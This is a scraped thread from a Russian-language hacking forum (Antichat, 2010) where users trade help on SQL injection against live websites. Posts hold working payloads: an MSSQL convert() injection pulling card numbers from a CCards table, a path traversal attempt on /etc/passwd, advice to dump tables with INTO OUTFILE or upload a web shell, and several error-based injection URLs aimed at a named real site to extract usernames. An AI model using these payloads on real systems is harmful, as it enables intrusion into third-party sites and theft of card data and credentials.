Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.04.2010, 13:00
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
У меня такой вопрос:
http://www.site.com/email.asp?id=2--&email=asd@asd.co'm
Ответ:
Microsoft OLE DB Provider for SQL Server error '80040e10'
Procedure or Function 'subscribe_email' expects parameter '@email', which was not supplied.
Кто может предположить как код выглядит? Там обращение к функции - но оно идет как asp код или sql?
В приведенном примере двойное тире комментирует поле имейла.
PS А еще интересно, что если я иду по:
http://www.site.com/email.asp?id=2, @email=1--&email=asd@asd.co'm
То поле email принимает указанное мною значение (единица)! И страничка успешно грузится.
Кто-нибудь понимает, что там происходит?
Последний раз редактировалось budden; 15.04.2010 в 17:10..
|
|
|

15.04.2010, 17:35
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме: 362547
Репутация:
93
|
|
Сообщение от Ins3t
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще? 
|
|
|

15.04.2010, 17:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
Сообщение от budden
[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--
O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..
и convert не идет там
Последний раз редактировалось [Feldmarschall]; 15.04.2010 в 17:43..
|
|
|

15.04.2010, 18:07
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Сообщение от [Feldmarschall]
O_o причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..
и convert не идет там
Я тебе показал, что для вызова ошибки с содержимым запроса можно использовать convert(), вместо @@version можешь подставить свой запрос.
Раз выдается ошибка на твой запрос, можно попробовать привести типы:
1'+or+1=convert(varchar,(select+top+1+CardNumber+f rom+CCards))--
|
|
|

15.04.2010, 18:23
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
не с convert все также
Последний раз редактировалось [Feldmarschall]; 15.04.2010 в 19:12..
|
|
|

15.04.2010, 19:23
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме: 79679
Репутация:
3
|
|
подскажите, как через sql inj сделать dump базы ?
|
|
|

15.04.2010, 20:07
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
Сообщение от Deani
подскажите, как через sql inj сделать dump базы ?
если есть права у тебя на запись в какую то директорию то можно сдампить структуру бд и данные из таблиц. но блин палево =\ лучше шел залить и там уже все одним файлом сдампить
мануалы читать можешь?
INTO OUTFILE
пример
SELECT * FROM Customers INTO OUTFILE '/home/site/kortinko/dump.txt'
Последний раз редактировалось xcedz; 15.04.2010 в 20:13..
|
|
|

15.04.2010, 20:39
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
помоqите поjaлуста
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x757365 725F7573657273%20limit%201,1),1,64),floor(rand(0)* 2)))
а вот не получается
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username1%20from%20user_use rs),1,64),floor(rand(0)*2)))
и так тоje
http://www.venen-kur.info/index.php?id=1319&lang=-1-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20username%20from%20user_user s),1,64),floor(rand(0)*2)))
Последний раз редактировалось LokbatanLi; 15.04.2010 в 20:44..
|
|
|

15.04.2010, 20:43
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Код:
http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
в чем трабл?
|
|
|

15.04.2010, 20:46
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
и так тоje
http://www.venen-kur.info/index.php?id=1319&lang=-1-1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select username1 from user_users),1,64),floor(rand(0)*2)))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|